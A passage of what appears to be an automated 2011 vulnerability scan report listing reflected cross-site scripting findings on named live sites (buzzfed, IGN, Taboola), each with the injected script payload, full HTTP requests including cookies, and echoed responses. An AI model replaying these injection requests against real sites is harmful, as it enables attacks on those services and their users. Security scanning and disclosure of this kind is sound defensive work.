Expires: Tue, 04 Oct 2011 21:23:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:14 GMT
Content-Length: 1321
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/tiny-edit.cssfea64'><script>alert(1)</script>d9bb724dfee?ver=1'>
...[SNIP]...

1.69. http://pglb.buzzfed.com/32418/5cca846e8e7b10d1bec731ed34643e04 [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pglb.buzzfed.com
Path:	/32418/5cca846e8e7b10d1bec731ed34643e04

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cb42d<script>alert(1)</script>34a3eaad9a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /32418/5cca846e8e7b10d1bec731ed34643e04?callback=BF_PARTNER.gate_responsecb42d<script>alert(1)</script>34a3eaad9a8&cb=9694 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Tue, 11 Oct 2011 20:11:28 GMT
Date: Tue, 04 Oct 2011 20:11:28 GMT
Connection: close

BF_PARTNER.gate_responsecb42d<script>alert(1)</script>34a3eaad9a8(1271435081);

1.70. http://pglb.buzzfed.com/32418/774318d75531cfaededa3a9d2cbab383 [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pglb.buzzfed.com
Path:	/32418/774318d75531cfaededa3a9d2cbab383

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d68f9<script>alert(1)</script>3dce0ab26ea was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /32418/774318d75531cfaededa3a9d2cbab383?callback=BF_PARTNER.gate_responsed68f9<script>alert(1)</script>3dce0ab26ea&cb=2778 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604791
Expires: Tue, 11 Oct 2011 20:19:42 GMT
Date: Tue, 04 Oct 2011 20:19:51 GMT
Connection: close

BF_PARTNER.gate_responsed68f9<script>alert(1)</script>3dce0ab26ea(1317659916);

1.71. http://pglb.buzzfed.com/39698/6d0094ff6569058b09e6fab4d74b9fcb [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pglb.buzzfed.com
Path:	/39698/6d0094ff6569058b09e6fab4d74b9fcb

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9e793<script>alert(1)</script>ec1ef213b74 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /39698/6d0094ff6569058b09e6fab4d74b9fcb?callback=BF_PARTNER.gate_response9e793<script>alert(1)</script>ec1ef213b74&cb=7694 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/company/about-us.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604797
Expires: Tue, 11 Oct 2011 22:19:54 GMT
Date: Tue, 04 Oct 2011 22:19:57 GMT
Connection: close

BF_PARTNER.gate_response9e793<script>alert(1)</script>ec1ef213b74(1313768178);

1.72. http://pglb.buzzfed.com/39698/6f8f1f6be3a9e039f40348adbcc25b28 [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pglb.buzzfed.com
Path:	/39698/6f8f1f6be3a9e039f40348adbcc25b28

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3bb62<script>alert(1)</script>362eec90e89 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /39698/6f8f1f6be3a9e039f40348adbcc25b28?callback=BF_PARTNER.gate_response3bb62<script>alert(1)</script>362eec90e89&cb=7926 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/articles/2011/10/04/the-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html?cid=askmentrade
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604775
Expires: Tue, 11 Oct 2011 20:18:08 GMT
Date: Tue, 04 Oct 2011 20:18:33 GMT
Connection: close

BF_PARTNER.gate_response3bb62<script>alert(1)</script>362eec90e89(1317701498);

1.73. http://pglb.buzzfed.com/39698/f959d1ec5ce0f34205021b068f0f6899 [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pglb.buzzfed.com
Path:	/39698/f959d1ec5ce0f34205021b068f0f6899

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8220a<script>alert(1)</script>fcd595438a2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /39698/f959d1ec5ce0f34205021b068f0f6899?callback=BF_PARTNER.gate_response8220a<script>alert(1)</script>fcd595438a2&cb=1779 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/company/contact-us.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Tue, 11 Oct 2011 22:17:32 GMT
Date: Tue, 04 Oct 2011 22:17:32 GMT
Connection: close

BF_PARTNER.gate_response8220a<script>alert(1)</script>fcd595438a2(1313768172);

1.74. http://social-services.ign.com/v1.0/social/rest/people/fedreg.150067215/@self [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social-services.ign.com
Path:	/v1.0/social/rest/people/fedreg.150067215/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 5b910<script>alert(1)</script>c36337bda10 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/fedreg.150067215/@self?jsonp=jsonp13177588132575b910<script>alert(1)</script>c36337bda10&_=1317758816914 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-02.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 1541
Date: Tue, 04 Oct 2011 20:10:05 GMT

jsonp13177588132575b910<script>alert(1)</script>c36337bda10({"startIndex":0,"count":1,"totalResults":1,"entry":[{"location":"Beverly Hills","settings":{"notifyOnWallPostReceived":"true","notifyOnFollowerReceived":"false","notifyOnLevelEarned":"false"},"type":"
...[SNIP]...

1.75. http://social-services.ign.com/v1.0/social/rest/people/fedreg.233293577/@self [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social-services.ign.com
Path:	/v1.0/social/rest/people/fedreg.233293577/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload f8a1e<script>alert(1)</script>bc7f5a60105 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/fedreg.233293577/@self?jsonp=jsonp1317758813258f8a1e<script>alert(1)</script>bc7f5a60105&_=1317758816915 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-03.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 1291
Date: Tue, 04 Oct 2011 20:10:05 GMT

jsonp1317758813258f8a1e<script>alert(1)</script>bc7f5a60105({"startIndex":0,"count":1,"totalResults":1,"entry":[{"location":"Hollywood, CA","settings":{"notifyOnWallPostReceived":"true","notifyOnFollowerReceived":"true","notifyOnLevelEarned":"true"},"type":"St
...[SNIP]...

1.76. http://social-services.ign.com/v1.0/social/rest/people/fedreg.259795679/@self [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social-services.ign.com
Path:	/v1.0/social/rest/people/fedreg.259795679/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 61ce5<script>alert(1)</script>09d15fd1a01 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/fedreg.259795679/@self?jsonp=jsonp131775881325661ce5<script>alert(1)</script>09d15fd1a01&_=1317758816914 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-02.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 1931
Date: Tue, 04 Oct 2011 20:10:09 GMT

jsonp131775881325661ce5<script>alert(1)</script>09d15fd1a01({"startIndex":0,"count":1,"totalResults":1,"entry":[{"settings":{"notifyOnWallPostReceived":"true","notifyOnReviewCommentReceived":"true","notifyOnBlogCommentReceived":"true","notifyOnFollowerReceived
...[SNIP]...

1.77. http://social-services.ign.com/v1.0/social/rest/people/fedreg.78864510/@self [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social-services.ign.com
Path:	/v1.0/social/rest/people/fedreg.78864510/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 47838<script>alert(1)</script>c6cbbc461de was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/fedreg.78864510/@self?jsonp=jsonp131775881325547838<script>alert(1)</script>c6cbbc461de&_=1317758816913 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-04.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 2287
Date: Tue, 04 Oct 2011 20:10:05 GMT

jsonp131775881325547838<script>alert(1)</script>c6cbbc461de({"startIndex":0,"count":1,"totalResults":1,"entry":[{"location":"San Francisco","settings":{"notifyOnWallPostReceived":"false","notifyOnFollowerReceived":"false","notifyOnLevelEarned":"false"},"type":
...[SNIP]...

1.78. http://social-services.ign.com/v1.0/social/rest/people/nickname.Interoceter%20/@self [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://social-services.ign.com
Path:	/v1.0/social/rest/people/nickname.Interoceter%20/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 3f36f<script>alert(1)</script>a1470682ff0 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/nickname.Interoceter%20/@self?jsonp=jsonp13177588132543f36f<script>alert(1)</script>a1470682ff0&_=1317758816912 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-01.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 2183
Date: Tue, 04 Oct 2011 20:10:03 GMT

jsonp13177588132543f36f<script>alert(1)</script>a1470682ff0({"startIndex":0,"count":1,"totalResults":1,"entry":[{"location":"Sector 7G","settings":{"notifyOnWallPostReceived":"true","notifyOnFollowerReceived":"true","notifyOnLevelEarned":"true"},"type":"Standa
...[SNIP]...

1.79. http://support.igninsider.com/ics/support/default.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://support.igninsider.com
Path:	/ics/support/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64259"><script>alert(1)</script>720bddf44f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ics/support/default.asp?deptID=3233&64259"><script>alert(1)</script>720bddf44f0=1 HTTP/1.1
Host: support.igninsider.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://support.igninsider.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 04 Oct 2011 22:06:22 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ParaturePortalSessionID=adaaa4e5%2D1241%2D4dd7%2D94cb%2De8cd8f657c71; path=/
Set-Cookie: ParaturePortalDeptID=3233; path=/
Vary: Accept-Encoding
Content-Length: 4128

<HTML>
<HEAD>

<base href="http://support.igninsider.com/ics/support/" />

<script type="text/javascript" src="/i
...[SNIP]...
<frame title="Left Navigation" name="cypLeft" src="KBFolder.asp?deptID=3233&64259"><script>alert(1)</script>720bddf44f0=1" marginheight=0 marginwidth=0 scrolling=auto>
...[SNIP]...

1.80. http://trc.taboolasyndication.com/ign-askmen/trc/2/json [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://trc.taboolasyndication.com
Path:	/ign-askmen/trc/2/json

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 94d18<script>alert(1)</script>d13c2880044 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ign-askmen/trc/2/json?tim=15%3A09%3A48.950&publisher=ign-askmen&pv=2&list-size=8&list-id=rbox-t2v&id=207&uim=article-horizontal&intent=u&uip=article-horizontal&external=http%3A%2F%2Fwww.askmen.com%2F&llvl=1&item-id=http%3A%2F%2Faskmen.com%2Ftop_10%2Fcars%2Ffastest-cars-in-the-world.html&item-type=text&item-url=http%3A%2F%2Faskmen.com%2Ftop_10%2Fcars%2Ffastest-cars-in-the-world.html&page-id=510356a1b27a2568a0a5b8d38eba109bc67661b8&cv=4-9-8-49662-3734132&uiv=default&cb=TRC.callbacks.recommendations_194d18<script>alert(1)</script>d13c2880044 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_user_id=ae7f02b7-d8fc-4e74-9744-efca878a3ea7

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Tue, 04 Oct 2011 20:31:49 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_1b0243f9d09f45382ea41ba6067243cc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1317760243_1317760309;Path=/ign-askmen/
Set-Cookie: JSESSIONID=.prod2-f2;Path=/
Set-Cookie: taboola_wv=;Path=/ign-askmen/;Expires=Wed, 03-Oct-12 20:31:49 GMT
Content-Length: 4358

TRC.callbacks.recommendations_194d18<script>alert(1)</script>d13c2880044({"trc":{"req":"e56e6f775f9c2e0da624f1b80e049cb8","session-id":"1b0243f9d09f45382ea41ba6067243cc","session-data":"v1_1b0243f9d09f45382ea41ba6067243cc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1317760243_131
...[SNIP]...

1.81. http://widgets.ign.com/disqus/comment/comment/ign-articles/1197949.jsonp [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.ign.com
Path:	/disqus/comment/comment/ign-articles/1197949.jsonp

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4c39a<script>alert(1)</script>cd50f099a7e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /disqus/comment/comment/ign-articles/1197949.jsonp?category=xboxlive&url=http%3A%2F%2Fxboxlive.ign.com%2Farticles%2F119%2F1197949p1.html&title=The+Top+25+Xbox+Live+Arcade+Games&callback=jsonp13177659042454c39a<script>alert(1)</script>cd50f099a7e&_=1317765942525 HTTP/1.1
Host: widgets.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(document.location)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317765782922%7C1412373782922%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317767582922%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dstitial.ign.com%253Aburp%3B%20s_c13%3Dstitial.ign.com%253Aburp%3B%20s_sq%3D%3B; rsi_segs=; decc=US; NGUserID=a5d4238-2364-1857667316-7; i18n-cc=US; freq=c-1317765778922v-1n-12mc+1317765778922mv+1mn+12wwe~0; optimizelyBuckets=%7B%228445302%22%3A8453327%7D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 2976
Accept-Ranges: bytes
X-Varnish: 1916941308
Expires: Tue, 04 Oct 2011 22:05:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 22:05:16 GMT
Connection: close

jsonp13177659042454c39a<script>alert(1)</script>cd50f099a7e("<script type=\"text\/javascript\">var cssNode = document.createElement('link');cssNode.type = 'text\/css';cssNode.rel = 'stylesheet';cssNod
...[SNIP]...

1.82. http://widgets.ign.com/global/page/followus.jsonp [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.ign.com
Path:	/global/page/followus.jsonp

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 844f6<script>alert(1)</script>5e7756dfe2d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /global/page/followus.jsonp?locale=us&layout=right_rail&callback=jsonp1317765904246844f6<script>alert(1)</script>5e7756dfe2d&_=1317765951425 HTTP/1.1
Host: widgets.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(document.location)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
